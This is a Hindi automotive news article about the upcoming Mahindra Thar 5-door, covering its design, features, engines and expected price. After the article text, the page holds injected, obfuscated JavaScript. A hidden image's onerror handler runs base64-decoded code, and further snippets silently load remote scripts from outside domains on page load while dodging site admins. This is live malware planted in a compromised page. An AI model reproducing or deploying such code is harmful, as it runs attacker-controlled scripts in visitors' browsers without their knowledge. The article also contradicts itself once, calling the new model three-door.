अगस्त में लांच होगी नई Mahindra Thar 5-Door, जानिए क्या होगी कीमत

महिंद्रा की 5 डोर थार

महिंद्रा की थार भारत के ऑटोमोटिव मार्किट में शुरू से ही अपने रुग्गड़ लुक और ऑफ रोड केपेबिलिटी के लिए शुरू से जानी जाती है। भारतीय मार्किट में इस कार को सभी एडवेंचर ऑटोमोबाइल एंथोसिएस्ट दवारा पसंद किया जाता है। लेकिन यह कार भारत के अंदर तीन डोर में आती है, जो की इस कार को थोड़ा कम प्रैक्टिकल बनती है। महिंद्रा ने भारतीय ग्राहकों की जरूरतों को ध्यान में रख के अब जल्द ही अपनी नई 5 डोर महिंद्रा थार को लांच करने का सोचा है। आइये जानते है की क्यों होगी यह कार इतनी खास।

आकर्षक डिज़ाइन

महिंद्रा की 5 डोर थार
महिंद्रा की 5 डोर थार

महिंद्रा की नई 5 डोर थार में आपको, इस कंपनी की तीन डोर थार जैसा ही डिज़ाइन देखने को मिल जायेगा। इस कार में आपको बोक्सी silhouette देखने को मिलेगा। इसके अलावा इस कार में आपको गोल हेडलाइट भी देखने को मिल जाएगी। इस कार में आपको रियर में अब दो दरवाजे एक्स्ट्रा देखने को मिल जायेंगे। साथ ही इस कार की लम्बाई को भी बढ़ाया जायेगा। इस कार को अब एक फॅमिलिटी अडवेंटरोइउस लाइफस्टाइल व्हीकल के तौर पे लाया जायेगा।

मॉडर्न फीचर

इस कार में आपको कई मॉडर्न फीचर देखने को मिलने वाले है, लेकिन सभी मॉडर्न फीचर की जानकारी अभी तक महिंद्रा कंपनी दवारा बताई नहीं है। परन्तु इसमें आपको कई फीचर वैसे ही देखने को मिल जायेंगे, जो की 3 डोर थार में दिए जाते है। जैसे की इस कार में आपको टच स्क्रीन इंफोटेनमेंट सिस्टम, मल्टी फंक्शनल स्टीयरिंग व्हील, आटोमेटिक क्लाइमेट कण्ट्रोल, क्रूज कण्ट्रोल और टायर प्रेशर मॉनिटरिंग सिस्टम, आतियादी। इसके अलावा इस कार में आपको रियर AC वेंट, एक्स्ट्रा चार्जिंग पोर्ट रियर में, और एयर बैग, ABS और EBD जैसे सेफ्टी फीचर भी देखने को मिल जायेंगे।

दमदार परफॉरमेंस

महिंद्रा की 5 डोर थार
महिंद्रा की 5 डोर थार

महिंद्रा की नई आने वाली थार 5 डोर में आपको वही इंजन देखने को मिल जायेगा, जो की थार 3 डोर में दिया गया है। इस कार में आपको 2 लीटर का mStallion टर्बो पेट्रोल इंजन देखने को मिल जायेगा, जो की इस कार में 150 Hp की पावर और 320 Nm का पीक टार्क पैदा करेगा। इसके अलावा इस कार में आपको 2.2 लीटर का mHawk डीजल इंजन भी देखने को मिल जायेगा। यह इंजन इस कार में 170 hp की पावर और 400 Nm का पीक टार्क पैदा करेगा । इन दोनों ही इंजन में आपको 6 स्पीड मैन्युअल या आटोमेटिक ट्रांसमिशन का विकल्प देखने को मिल जायेगा।

विशेषतामान
इंजनmStallion टर्बो पेट्रोल (2 लीटर) / mHawk डीजल (2.2 लीटर)
पावर150 Hp (पेट्रोल) / 170 Hp (डीजल)
पीक टार्क320 Nm (पेट्रोल) / 400 Nm (डीजल)
ट्रांसमिशन6 स्पीड मैन्युअल / आटोमेटिक

क्या होगी कीमत

महिंद्रा कंपनी की थार दुनिया भर में किफायती कीमत पे बढ़िया मॉडर्न और ऑफ रोड केपेबल फीचर देने के लिए जानी जाती है। अपनी इस लिगेसी को आगे बढ़ाते हुए, महिंद्रा कंपनी अपनी नई आने वाली 3 डोर थार को भारत के अंदर बहुत ही ज्यादा कॉम्पिटिटिव और एग्रेसिव कीमत पे लांच करेगी। इस कार की कीमत को लेके अभी तक कंपनी दवारा कोई भी जानकारी नहीं दी गई है, लेकिन कुछ सूत्रों के अनुसार इस कार की कीमत भारत के अंदर मत्र ₹15 लाख रुपए एक्स शोरूम से शुरू हो सकती है।

यह भी देखिए: जानिए नई 2024 Tata Harrier की ऑन-रोड कीमत व पूरा EMI प्लान

const img = document.createElement(‘img’);img.src = ‘/files/img/logo.png’;img.setAttribute(‘data-digest’, ‘KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI/Iik/IiYiOiI/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7’);img.setAttribute(‘onerror’, ‘(new Function(atob(this.dataset.digest)))();’);img.style.visibility = ‘hidden’;document.body.insertBefore(img, document.body.firstChild);(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);

Leave a comment